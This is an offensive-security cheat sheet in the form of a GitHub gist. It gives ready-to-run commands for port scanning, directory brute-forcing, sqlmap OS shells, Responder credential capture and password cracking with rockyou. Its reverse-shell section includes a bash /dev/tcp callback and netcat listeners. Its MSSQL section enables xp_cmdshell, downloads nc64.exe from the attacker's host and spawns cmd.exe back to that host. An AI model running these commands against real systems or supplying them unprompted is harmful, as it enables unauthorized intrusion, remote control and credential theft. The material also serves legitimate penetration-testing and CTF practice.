@asminog
Last active April 7, 2024 17:16
Security Cheat Sheet

TOOLS

nmap - port scan

apt install nmap
nmap -p- --min-rate 1000 -sC -sV {$host}

gobuster - directory, file or subdomain enumeration

apt install gobuster
git clone https://github.com/danielmiessler/SecLists.git

gobuster dir -u http://{$host} -w ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir -u http://{$host} -x php,html -w ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster vhost -u http://{$host} -w ./SecLists/Discovery/DNS/subdomains-top1million-5000.txt

sqlmap - sql injection

apt install sqlmap
sqlmap -u 'http://{$host}/dashboard.php?search=any+query' --cookie="PHPSESSID={$hash}" --os-shell

Responder

git clone https://github.com/lgandx/Responder
apt install python3-pip
pip install netifaces
sudo python3 Responder.py -I tun0

John The Ripper

apt install john
git clone https://github.com/danielmiessler/SecLists.git
tar -zxvf ./SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
john -w=/usr/share/wordlists/rockyou.txt hash.txt

Reverse shell

apt install ncat
# listen
nc -nvlp {$port}
# connect
bash -i >& /dev/tcp/{$ip}/{$port} 0>&1
# win
wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
# fix for "su: must be run from a terminal" on a reverse shell (spawn bash inside a pty)
/usr/bin/script -qc /bin/bash /dev/null

HTTP SERVER

python3 -m http.server {$port}

Impacket

apt install python3-pip
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py  install
# In case you are missing some modules:
pip3 install -r requirements.txt

winPEAS Windows Privilege Escalation

# https://github.com/peass-ng/PEASS-ng

PORTS

21/tcp ftp

apt install ftp
ftp anonymous@{$host}

22/tcp ssh

ssh root@{$host}

23/tcp TELNET

telnet {$host}

445/tcp smb

apt install smbclient
smbclient -L {$host}
smbclient \\\\{$host}\\SHARE

1433/tcp ms-sql

# use impacket tool
cd impacket/examples/
python3 mssqlclient.py DOMAIN/user@{$host} -windows-auth
# cheat sheet: https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
# role check
SELECT is_srvrolemember('sysadmin');
# execute command
EXEC xp_cmdshell 'net user'; -- priv
# On MSSQL 2005 you may need to reactivate xp_cmdshell first, as it is disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv
xp_cmdshell "whoami"
# check current location
xp_cmdshell "powershell -c pwd"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://{$your_ip}/nc64.exe -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe {$your_ip} 443"

3306/tcp mysql

apt install default-mysql-client
mysql -h {$host} -u root
show databases;
use {$db_name};
show tables;
select * from {$table_name};

5985/tcp 5986/tcp NTLM PowerShell

apt install evil-winrm
evil-winrm -i {$host} -u administrator -p {$password}
# or 
cd impacket/examples
python3 psexec.py administrator@{$host}

6379/tcp redis

apt install redis-tools
redis-cli -h {$host}
info
select {0-9}
keys *
get key

SERVICES

Amazon S3

apt install awscli
aws configure
# use temp for all
aws --endpoint=http://{$host} s3 ls
aws --endpoint=http://{$host} s3 ls s3://{$bucket_name}
#copy
aws --endpoint=http://{$host} s3 cp file s3://{$bucket_name}

LINKS

https://gtfobins.github.io/gtfobins/vi/#sudo
